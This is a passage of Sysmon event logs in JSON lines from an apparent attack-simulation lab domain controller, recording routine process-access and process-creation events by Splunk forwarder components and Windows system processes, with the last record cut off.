{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6848,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.085\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-221C-5F25-0000-001004F90A00}\r\nTargetProcessId: 4208\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.085","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-221C-5F25-0000-001004F90A00}","TargetProcessId":"4208","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6849,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.210\r\nSourceProcessGUID: {41C8662E-221C-5F25-0000-001004F90A00}\r\nSourceProcessId: 4208\r\nSourceThreadId: 3816\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.210","SourceProcessGUID":"{41C8662E-221C-5F25-0000-001004F90A00}","SourceProcessId":"4208","SourceThreadId":"3816","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6850,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.681\r\nProcessGuid: {41C8662E-221C-5F25-0000-001017FB0A00}\r\nProcessId: 2232\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.681","ProcessGuid":"{41C8662E-221C-5F25-0000-001017FB0A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:04:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6851,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.679\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-221C-5F25-0000-001017FB0A00}\r\nTargetProcessId: 2232\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.679","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-221C-5F25-0000-001017FB0A00}","TargetProcessId":"2232","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6852,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.679\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-221C-5F25-0000-001017FB0A00}\r\nTargetProcessId: 2232\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.679","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-221C-5F25-0000-001017FB0A00}","TargetProcessId":"2232","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6853,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.679\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.679","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6854,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.679\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.679","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6855,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.679\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.679","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6856,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.679\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.679","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 